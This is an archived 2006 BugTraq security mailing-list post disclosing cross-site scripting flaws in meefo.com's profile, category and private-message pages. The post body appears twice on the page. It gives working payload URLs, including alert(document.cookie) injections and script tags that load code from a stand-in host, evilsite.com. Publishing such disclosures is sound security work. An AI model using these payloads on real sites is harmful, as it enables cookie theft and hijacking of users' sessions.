BugTraq
Back to list
|
Post reply
Meefo.com - XSS with cookie include
Jun 10 2006 09:38PM
luny youfucktard com
Meefo.com
Homepage:
http://meefo.com
Effected files:
reading profiles
index.php
input boxes onprofiles
sending private msgs
------------------------------
Reading aprofile and with cookie include PoC:
Since data isn't properlly filtered (backslashes are added to ' and "), a user can input malicious data, such as
<script>alert(document.cookie)</script> and itwill popup with the users cookie. Incldued at the end of this article are
screenshots of the cookie vuln. Screenshots meefo4 and meefo5.jpg show this.
http://meefo.com/?do=rdprof&user_pp=username<script>alert(document.cooki
e)</script>
When editing your profile, data isn't properally filtered in theinput boxes either, so <script>alert(document.cookie)</
script> works here too.
Another XSS Vulnerability example:
http://meefo.com/?do=rdprof&user_pp=<SCRIPT SRC=http://evilsite.com/xss.js></SCRIPT>
Reading catagories XSS Vuln:
http://meefo.com/index.php?cat=Poetry<SCRIPT SRC=http://evilsite.com/xss.js></SCRIPT>
Sending PM's XSS Vuln:
http://meefo.com/?messages=send&to=<SCRIPT SRC=http://evilsite.com/xss.js></SCRIPT>
Screenshots of cookie include vulns & more:
http://www.youfucktard.com/xsp/meefo1.jpg
http://www.youfucktard.com/xsp/meefo2.jpg
http://www.youfucktard.com/xsp/meefo3.jpg
http://www.youfucktard.com/xsp/meefo4.jpg
http://www.youfucktard.com/xsp/meefo5.jpg
http://www.youfucktard.com/xsp/meefo6.jpg
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
Homepage:
http://meefo.com
Effected files:
reading profiles
index.php
input boxes onprofiles
sending private msgs
------------------------------
Reading aprofile and with cookie include PoC:
Since data isn't properlly filtered (backslashes are added to ' and "), a user can input malicious data, such as
<script>alert(document.cookie)</script> and itwill popup with the users cookie. Incldued at the end of this article are
screenshots of the cookie vuln. Screenshots meefo4 and meefo5.jpg show this.
http://meefo.com/?do=rdprof&user_pp=username<script>alert(document.cooki
e)</script>
When editing your profile, data isn't properally filtered in theinput boxes either, so <script>alert(document.cookie)</
script> works here too.
Another XSS Vulnerability example:
http://meefo.com/?do=rdprof&user_pp=<SCRIPT SRC=http://evilsite.com/xss.js></SCRIPT>
Reading catagories XSS Vuln:
http://meefo.com/index.php?cat=Poetry<SCRIPT SRC=http://evilsite.com/xss.js></SCRIPT>
Sending PM's XSS Vuln:
http://meefo.com/?messages=send&to=<SCRIPT SRC=http://evilsite.com/xss.js></SCRIPT>
Screenshots of cookie include vulns & more:
http://www.youfucktard.com/xsp/meefo1.jpg
http://www.youfucktard.com/xsp/meefo2.jpg
http://www.youfucktard.com/xsp/meefo3.jpg
http://www.youfucktard.com/xsp/meefo4.jpg
http://www.youfucktard.com/xsp/meefo5.jpg
http://www.youfucktard.com/xsp/meefo6.jpg
[ reply ]